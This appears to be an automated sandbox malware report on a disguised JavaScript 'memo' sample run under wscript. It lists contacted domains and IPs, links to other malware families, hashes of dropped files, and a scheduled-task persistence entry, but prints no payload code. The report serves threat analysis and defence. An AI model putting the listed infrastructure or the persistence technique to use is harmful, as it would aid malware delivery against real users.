00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://jquery.com/wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://promisesaplus.com/#point-61wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    141.193.213.10
                                                    skagitorganics.netUnited States
                                                    396845DV-PRIMARY-ASN1USfalse
                                                    104.26.1.204
                                                    pydata.orgUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    88.218.116.137
                                                    pensuni.comIsrael
                                                    209622UPRESS-DRBILfalse
                                                    194.163.167.35
                                                    saeedmdcat.comGermany
                                                    6659NEXINTO-DEfalse
                                                    67.205.27.249
                                                    www.anifowoshe.comUnited States
                                                    26347DREAMHOST-ASUSfalse
                                                    104.21.10.224
                                                    alseraj.netUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    129.232.136.170
                                                    wickandjuice.co.zaSouth Africa
                                                    37153xneeloZAfalse
                                                    172.105.162.7
                                                    acceleratedigital.com.auUnited States
                                                    63949LINODE-APLinodeLLCUSfalse
                                                    66.198.240.43
                                                    werrrk.comUnited States
                                                    55293A2HOSTINGUSfalse
                                                    197.189.243.212
                                                    thezoneheights.co.zaSouth Africa
                                                    37153xneeloZAfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1577279
                                                    Start date and time:2024-12-18 11:10:04 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 17m 55s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                    Run name:Suspected Instruction Hammering
                                                    Number of analysed new started processes analysed:25
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Memo - Impairment Test 2023 MEX010B (5).js
                                                    Detection:MAL
                                                    Classification:mal76.expl.evad.winJS@19/13@12/10
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .js
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.216.73.151, 23.45.49.152
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    TimeTypeDescription
                                                    11:16:07Task SchedulerRun new task: Serials Management path: wscript s>AUTOMO~1.JS
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    141.193.213.10PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/zdt7/
                                                    ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/tswh/
                                                    INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/zdt7/
                                                    NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/9g6s/
                                                    Indocount Invoice Amendment.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobeuseren.org/zdt7/
                                                    HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/zdt7/
                                                    18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/9g6s/
                                                    OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                    • www.meanttobebroken.org/zdt7/
                                                    bin.exeGet hashmaliciousUnknownBrowse
                                                    • www.meanttobebroken.org/zdt7/
                                                    PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                    • www.meanttobebroken.org/9g6s/
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                    • 104.21.23.76
                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                    • 172.67.191.110
                                                    NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.64.41.3
                                                    hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.197.170
                                                    Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 104.26.13.205
                                                    PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 104.26.12.205
                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                    • 172.64.41.3
                                                    https://2024sharepointonline.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                    • 104.16.20.118
                                                    https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                    • 1.1.1.1
                                                    EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    NEXINTO-DEClient.exeGet hashmaliciousNjratBrowse
                                                    • 194.163.139.18
                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 212.221.170.188
                                                    Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                    • 194.195.220.41
                                                    teste.m68k.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                    • 195.179.60.20
                                                    File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                    • 212.229.88.28
                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 212.228.4.135
                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                    • 194.163.209.67
                                                    W3UokmKK3o.msiGet hashmaliciousUnknownBrowse
                                                    • 195.179.237.110
                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                    • 194.195.220.41
                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 212.229.165.81
                                                    UPRESS-DRBILhttp://www.wtb.org.ilGet hashmaliciousUnknownBrowse
                                                    • 88.218.116.172
                                                    hrwkmsxama.exeGet hashmaliciousUnknownBrowse
                                                    • 88.218.117.108
                                                    https://s-loan.co.il/wp-includes/css/joomla/indexes.html#51433426769206960481707720955747700549297-68783845964196083810911039158559-ibmxcharmainer-rex-dotsure.co.zaGet hashmaliciousUnknownBrowse
                                                    • 88.218.117.167
                                                    ShipmentReceipt_Notification_20221805PDF.vbsGet hashmaliciousGuLoaderBrowse
                                                    • 88.218.118.80
                                                    https://www.k-h.co.il/Get hashmaliciousUnknownBrowse
                                                    • 88.218.117.114
                                                    DV-PRIMARY-ASN1UShttps://technicalwriterhq.com/Get hashmaliciousUnknownBrowse
                                                    • 141.193.213.20
                                                    https://selbe.ar/wp-admin/maint/sMNGmQIh.txtGet hashmaliciousUnknownBrowse
                                                    • 141.193.213.10
                                                    https://selbe.ar/wp-admin/maint/sMNGmQIh.txtGet hashmaliciousUnknownBrowse
                                                    • 141.193.213.11
                                                    http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                    • 141.193.213.11
                                                    https://schmidt-arch.com/Get hashmaliciousUnknownBrowse
                                                    • 141.193.213.10
                                                    https://www.collage.inc/Get hashmaliciousUnknownBrowse
                                                    • 141.193.213.11
                                                    https://alessiabelltravel.com/Get hashmaliciousUnknownBrowse
                                                    • 141.193.213.10
                                                    https://www.alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                    • 141.193.213.11
                                                    https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                    • 141.193.213.20
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eAwb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    twjMb9cX64.exeGet hashmaliciousSliverBrowse
                                                    • 141.193.213.10
                                                    • 104.26.1.204
                                                    • 88.218.116.137
                                                    • 194.163.167.35
                                                    • 67.205.27.249
                                                    • 104.21.10.224
                                                    • 129.232.136.170
                                                    • 172.105.162.7
                                                    • 66.198.240.43
                                                    • 197.189.243.212
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):19604
                                                    Entropy (8bit):5.00869778662056
                                                    Encrypted:false
                                                    SSDEEP:384:Wrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQfdjes+YW+OdBNNXp5eYoaYpib47:WLmV3IpNBQkj2Uh4iUxDhEdCs+YW+Odi
                                                    MD5:0077C1A6826B3298AC06F6A2B46CA9B5
                                                    SHA1:E6091039BF51485781E24CB688DAF2E246FA236C
                                                    SHA-256:F0CBFB8DED5445FFC9B15E34FB6351226C27F257F6BD5CDE99503E6A0CD243FE
                                                    SHA-512:9B73A53409B2490D713FE11E83060E22604C9E6E787F4C111241E71FDEF9663718D3BA2AE16A0CC1EA2D0FA6A72B8F660C01C132A32096355B4476DA4338F93A
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):4609818
                                                    Entropy (8bit):5.508029743425627
                                                    Encrypted:false
                                                    SSDEEP:12288:5ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ3:h
                                                    MD5:6166491AD0AFD48DDF8A220C09647ACF
                                                    SHA1:EAB4DB5DE13CD5A0DC2AE132FC99417C0D04DF8C
                                                    SHA-256:3FAFB3A2D8317E616647C7A8515109B517FD7A194694D7992F0CC451175687E0
                                                    SHA-512:25952807D8044F3DBD2F597139FF38873666CB8529DC5EB98B35A10B2AC8DF2D6F07EDDF4D29575A4AE6037B4164CB1792615F7FC289EB2F6F863EF313908285
                                                    Malicious:true
